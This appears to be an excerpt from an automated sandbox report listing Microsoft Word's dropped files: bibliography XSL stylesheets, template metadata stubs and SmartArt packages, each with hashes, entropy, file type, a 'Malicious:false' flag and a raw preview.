                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):332
                                                                                                                                                                                                                                                                Entropy (8bit):3.547857457374301
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                MD5:4EC6724CBBA516CF202A6BD17226D02C
                                                                                                                                                                                                                                                                SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                                                                                                                                                                                                                                                SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                                                                                                                                                                                                                                                SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):284415
                                                                                                                                                                                                                                                                Entropy (8bit):5.00549404077789
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                                                                                                                                                                MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                                                                                                                                                                SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                                                                                                                                                                SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                                                                                                                                                                SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):252
                                                                                                                                                                                                                                                                Entropy (8bit):3.4680595384446202
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:D79B5DE6D93AC06005761D88783B3EE6
                                                                                                                                                                                                                                                                SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                                                                                                                                                                                                                                                SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                                                                                                                                                                                                                                                SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5783
                                                                                                                                                                                                                                                                Entropy (8bit):7.88616857639663
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                                                                                                                                                MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                                                                                                                                                SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                                                                                                                                                SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                                                                                                                                                SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):290
                                                                                                                                                                                                                                                                Entropy (8bit):3.5081874837369886
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                                                                                                                                                                                                                                                SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                                                                                                                                                                                                                                                SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                                                                                                                                                                                                                                                SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):255948
                                                                                                                                                                                                                                                                Entropy (8bit):5.103631650117028
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                                                                                                                                                                MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                                                                                                                                                                SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                                                                                                                                                                SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                                                                                                                                                                SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):286
                                                                                                                                                                                                                                                                Entropy (8bit):3.538396048757031
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                MD5:149948E41627BE5DC454558E12AF2DA4
                                                                                                                                                                                                                                                                SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                                                                                                                                                                                                                                                SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                                                                                                                                                                                                                                                SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):250983
                                                                                                                                                                                                                                                                Entropy (8bit):5.057714239438731
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                                                                                                                                                                MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                                                                                                                                                                SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                                                                                                                                                                SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                                                                                                                                                                SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16806
                                                                                                                                                                                                                                                                Entropy (8bit):7.9519793977093505
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                                                                                                                                                                MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                                                                                                                                                                SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                                                                                                                                                                SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                                                                                                                                                                SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):254
                                                                                                                                                                                                                                                                Entropy (8bit):3.4720677950594836
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                                                                                                                                                                                                                                SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                                                                                                                                                                                                                                SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                                                                                                                                                                                                                                SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):286
                                                                                                                                                                                                                                                                Entropy (8bit):3.5502940710609354
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                                                                                                                                                                                                                                                SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                                                                                                                                                                                                                                                SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                                                                                                                                                                                                                                                SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):270198
                                                                                                                                                                                                                                                                Entropy (8bit):5.073814698282113
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                                                                                                                                                                MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                                                                                                                                                                SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                                                                                                                                                                SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                                                                                                                                                                SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):290
                                                                                                                                                                                                                                                                Entropy (8bit):3.5161159456784024
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                                                                                                                                                                                                                                                SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                                                                                                                                                                                                                                                SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                                                                                                                                                                                                                                                SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):344303
                                                                                                                                                                                                                                                                Entropy (8bit):5.023195898304535
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                                                                                                                                                                MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                                                                                                                                                                SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                                                                                                                                                                SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                                                                                                                                                                SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):256
                                                                                                                                                                                                                                                                Entropy (8bit):3.4842773155694724
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:923D406B2170497AD4832F0AD3403168
                                                                                                                                                                                                                                                                SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                                                                                                                                                                                                                                SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                                                                                                                                                                                                                                SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
